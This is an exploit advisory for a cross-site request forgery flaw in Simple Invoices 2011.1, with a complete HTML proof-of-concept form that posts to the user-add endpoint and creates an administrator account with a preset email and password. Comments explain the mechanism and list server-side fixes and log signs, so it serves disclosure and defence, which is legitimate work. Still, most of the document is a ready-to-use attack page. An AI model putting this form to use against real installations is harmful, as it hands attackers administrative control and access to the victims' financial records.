# Affected software: Simple Invoices
# Type of vulnerability: adding an admin user via CSRF
# URL: simpleinvoices.org
# Discovered by: provensec
# Website: provensec.com

# Version: 2011.1
# Proof of concept

<!--
  Proof-of-concept page for the CSRF described in the header above.
  The form below is a plain cross-origin POST to the user-add endpoint:
  it carries no per-session anti-CSRF token and nothing the hosting page
  could not know in advance (every field is a static literal), so if a
  logged-in administrator submits it the browser attaches their session
  cookie and the server handles it like a legitimate "Insert User"
  submission.
  Defensive reading: the fix is server-side. A synchronizer token checked
  on module=user&view=add, a SameSite session cookie, and Origin/Referer
  validation each break this page; method="POST" by itself is not a
  defence. In access logs such a request shows up as a user-insert POST
  whose Referer/Origin, when present, is not the application's own host.
-->
<html>

  <body>
    <!-- Target is the project's demo host; the query string only selects
         the user module's "add" view, there is no token parameter. -->
    <form action="
http://demo.simpleinvoices.org/index.php?module=user&view=add"
method="POST">
      <!-- Character references (&#64; = "@", &#46; = ".", &#95; = "_",
           &#32; = space) are decoded by the browser before submission, so
           the posted names/values are plain text; the encoding does not
           change the request the server receives. -->
      <input type="hidden" name="email" value="aaaa&#64;gmail&#46;com" />
      <!-- role=1: presumably the administrator role, given the header's
           "adding admin user"; confirm against the application's role list. -->
      <input type="hidden" name="role" value="1" />
      <!-- Submitted as the field name password_field. -->
      <input type="hidden" name="password&#95;field" value="lalala123&#64;"
/>
      <input type="hidden" name="enabled" value="1" />
      <!-- "submit" (value "Insert User") and "op" (value "insert_user") are
           sent as hidden fields so the handler sees the same parameters the
           application's own form button would send; inferred from the
           values, not verified against the application source. -->
      <input type="hidden" name="submit" value="Insert&#32;User" />
      <input type="hidden" name="op" value="insert&#95;user" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>